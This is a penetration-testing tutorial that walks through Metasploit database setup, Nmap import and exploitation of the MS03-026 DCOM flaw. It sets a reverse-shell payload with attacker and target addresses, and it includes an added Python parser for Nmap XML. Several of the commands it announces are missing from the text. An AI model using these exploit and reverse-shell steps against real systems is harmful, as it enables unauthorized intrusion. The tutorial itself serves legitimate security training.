So you have done some recon on your potential target and now you are in the exploitation phase of your pentest. Metasploit can connect to a database to keep track of the recon you collected on your targets. You can import an XML report from your Nmap scan, or you can use the db_nmap command inside Metasploit. That is jumping the gun a little. We will first need to bring up Metasploit and then create a database connection to your database of choice. All examples and commands will be done through BackTrack 4 R2.
First, let's start MySQL:
Then we will launch Metasploit:
Now we need to tell Metasploit to use the mysql database driver:
Next we will connect Metasploit to the MySQL database named metasploit:
In the above example we listed the hosts the database contained right after connecting. No results is good news, as it tells us we are working with a database that does not contain any records yet.
Let's put some results into the database using the db_nmap command:
Just like in the Nmap tutorial, I am using a single target machine to show the steps. Let's see what our results are:
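Metasploit's db_import does the same thing as db_nmap with an Nmap -oX report: it parses the hosts and open ports into its hosts and services tables. The Python below is an added illustration (not part of this tutorial, not Metasploit's own code) that performs that minimal parse on a constructed sample report, drops hosts that are down and ports that are not open, and then lists which hosts expose 135/tcp, the MS-RPC endpoint that MS03-026 concerns, so a defender can see from the same scan data which machines need the patch first.

```python
import xml.etree.ElementTree as ET

# Constructed sample in Nmap's -oX report format (not real scan output).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -oX scan.xml 192.168.0.0/24">
  <host><status state="up"/><address addr="192.168.0.32" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="closed"/><service name="ms-wbt-server"/></port>
    </ports>
  </host>
  <host><status state="up"/><address addr="192.168.0.40" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port></ports>
  </host>
  <host><status state="down"/><address addr="192.168.0.41" addrtype="ipv4"/></host>
</nmaprun>
"""

def parse_nmap_xml(xml_text):
    """Return {ip: [(proto, port, service_name), ...]} for hosts that are up, open ports only."""
    root = ET.fromstring(xml_text)
    hosts = {}
    for host in root.findall("host"):
        status = host.find("status")
        addr = host.find("address[@addrtype='ipv4']")
        if status is None or status.get("state") != "up" or addr is None:
            continue  # down hosts never make it into the inventory
        services = []
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are not services
            svc = port.find("service")
            services.append((port.get("protocol"), int(port.get("portid")),
                             svc.get("name") if svc is not None else None))
        hosts[addr.get("addr")] = services
    return hosts

def hosts_exposing(hosts, proto, port):
    """IPs with the given service open, e.g. ("tcp", 135): the MS-RPC endpoint mapper."""
    return sorted(ip for ip, services in hosts.items()
                  if any(p == proto and n == port for p, n, _ in services))

if __name__ == "__main__":
    inventory = parse_nmap_xml(SAMPLE_NMAP_XML)
    print("inventory:", inventory)
    print("135/tcp exposed on:", hosts_exposing(inventory, "tcp", 135))
```

Point parse_nmap_xml at the contents of a real -oX file to get the same host/service view Metasploit's db_hosts and db_services show after an import.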
At this point we could use db_autopwn and go to town on the targets in the database.
This will surely get you caught in a properly secured environment, but we can still use the db_autopwn tool to narrow our exploit search.
Looking through the list we see MS03_026, which is an extremely easy and successful method of attack for unpatched NT-family computers like XP SP0. More information on MS03_026 can be found by its CVE on the NIST website. Information on the Metasploit exploit can be found here. Let's use this exploit:
As you can see we are dropped into a command prompt for the target by using the following commands:
This command tells Metasploit to use the ms03_026_dcom exploit.
set payload generic/shell_reverse_tcp
This command sets the payload; in this case it is a reverse shell. This has the target initiate the connection back to our box to evade firewall restrictions, since most firewalls are set up to allow anything out and only a handful of ports in.
set lhost 192.168.0.29
This command sets the address of the box that will accept the reverse shell.
set rhost 192.168.0.32
This command sets the address of the target box.
This command tells Metasploit to execute the exploit.
If your exploit was successful then you will see your shell to the target machine. A great place to get more information on Metasploit would be the Offensive-Security.com Metasploit Unleashed course available for free on the Offensive-security.com website. Another great source for metasploit information is “The Metasploit Book” Wiki at wikibooks.